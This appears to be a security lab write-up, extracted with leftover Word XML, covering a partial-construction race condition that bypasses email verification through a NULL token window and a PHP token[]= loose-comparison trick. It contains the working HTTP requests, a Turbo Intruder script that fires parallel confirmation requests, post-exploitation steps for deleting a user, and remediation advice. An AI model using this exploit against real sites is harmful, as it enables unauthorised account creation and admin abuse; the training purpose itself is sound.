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Expert Lab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Partial Construction Race Condition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A56A0" w:sz="8" w:space="4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 Condition / Authentication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Construction — NULL token window during registration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Suite Professional, Turbo Intruder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token[]= payload + gate mechanism for simultaneous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Bypass email verification and delete user carlos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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lab demonstrates a race condition vulnerability in a user registration system. By exploiting a timing gap during account creation, it is possible to bypass email verification entirely — registering a valid account without owning or accessing the target email address.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Unlike file upload race conditions which exploit a gap between save and delete, this attack exploits a gap between user creation and token storage — a partial construction window where the token value is NULL in the database.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NORMAL APPLICATION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submits registration form → account created in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generates a confirmation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 stored in database against the user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 sent to the user's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confirmation link → /confirm?token=XYZ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validates token → account confirmed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THE VULNERABILITY — PARTIAL CONSTRUCTION WINDOW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critical flaw exists in the gap between step 1 (account created) and step 3 (token stored). During this tiny window, the confirmation token has not yet been written to the database — it is NULL.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Account created in DB  →  [GAP: token is NULL]  →  Token stored in DB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↑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Attack window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confirmation request arrives during this window, the server compares the submitted token against NULL. Sending token[]= (an empty PHP array) causes the backend to treat the submitted value as NULL — matching the unset token and bypassing verification.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token[]= Works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Submitted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DB Token (during window)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token=abc123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 — mismatch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token[]=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— null matches null (PHP loose comparison)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token=abc123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abc123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— correct token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PHP, passing token[]= sends an empty array. When compared against NULL using loose comparison (==), PHP evaluates this as equal. The fix is to use strict comparison (===) which would reject the type mismatch.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EXPLOITATION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Registration Request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Intercepted the registration POST request in Burp Proxy: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/register HTTP/2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phpsessionid=&lt;session&gt;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application/x-www-form-urlencoded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csrf=&lt;token&gt;&amp;username=%s&amp;email=test@ginandjuice.shop&amp;password=12345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%s placeholder in the username field is replaced by Turbo Intruder with unique usernames (User0, User1...) for each attempt.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Confirmation Request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confirmation request uses token[]= to send a null-equivalent token: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/confirm?token[]= HTTP/2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phpsessionid=&lt;session&gt;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Content-Length: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Turbo Intruder Script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Sent the registration request to Turbo Intruder. The script runs 20 attempts, each firing 1 registration + 50 simultaneous confirmation requests through the same gate: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queueRequests(target, wordlists):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engine = RequestEngine(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endpoint=target.endpoint,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concurrentConnections=1,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engine=Engine.BURP2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confirmationReq = '''POST /confirm?token[]= HTTP/2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phpsessionid=&lt;session&gt;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Content-Length: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'''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attempt in range(20):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gate = str(attempt)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username = 'User' + gate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Registration request with unique username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engine.queue(target.req, username, gate=gate)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50 confirmation requests through same gate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for i in range(50):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engine.queue(confirmationReq, gate=gate)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Release all simultaneously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engine.openGate(gate)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handleResponse(req, interesting):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table.add(req)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50 confirmations per attempt: The partial construction window is microseconds wide — far narrower than the file upload race condition. Sending 50 simultaneous confirmations dramatically increases the probability that at least one lands during the window.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 Results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Turbo Intruder results table, a successful bypass shows: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Account registration for user UserX successful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requests: 20 attempts x 51 requests = 1020 requests. One attempt wins the race — email verification bypassed.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COMPARISON WITH FILE UPLOAD RACE CONDITION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File Upload Race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Partial Construction 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validation gap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initialisation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request to file path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token[]= (null-equivalent)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Repeater parallel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Turbo Intruder + Engine.BURP2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Attempts needed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attempt usually sufficient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attempts x 50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harder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Longer window — easier to hit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Narrower window — needs volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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POST-EXPLOITATION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6.1 Login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Username: UserX   (whichever attempt succeeded)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Password: 12345</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"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6.2 Delete Carlos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 the admin panel after logging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Locate the user carlos in the user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the account — lab solved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construction vulnerabilities occur when objects are created before fully initialised — the gap between creation and completion is exploitable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token[]= exploits PHP loose comparison — an empty array compared against NULL evaluates as equal; always use strict === in authentication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More simultaneous requests compensate for narrower windows — 50 confirmations per attempt handles microsecond-scale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Turbo Intruder with Engine.BURP2 is necessary for precision timing — Burp's native parallel sending is insufficient for microsecond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verification race conditions are a real bug class — any registration flow that creates a user before writing the token is potentially vulnerable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%s substitution enables testing multiple unique usernames in one run — essential since each failed attempt creates a new database record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REAL-WORLD RELEVANCE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vulnerability class applies to any application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Creates database records before completing their initialisation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Uses multi-step processes where intermediate states are queryable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Implements verification with a gap between record creation and token assignment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bug bounty examples: account takeover via registration race conditions, password reset token bypass, 2FA code bypass during session initialisation.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9. REMEDIATION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token accepted during construction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strict === comparison; initialise token before creating user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token[]= PHP type confusion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token is a string before comparison; reject array inputs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rate limiting on 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rate limiting on confirmation endpoint to prevent mass parallel requests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created before token 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user creation and token assignment atomic — single database transaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="1A56A0" w:sz="4" w:space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2026-04-02T12:43:15.032Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-02T12:43:15.033Z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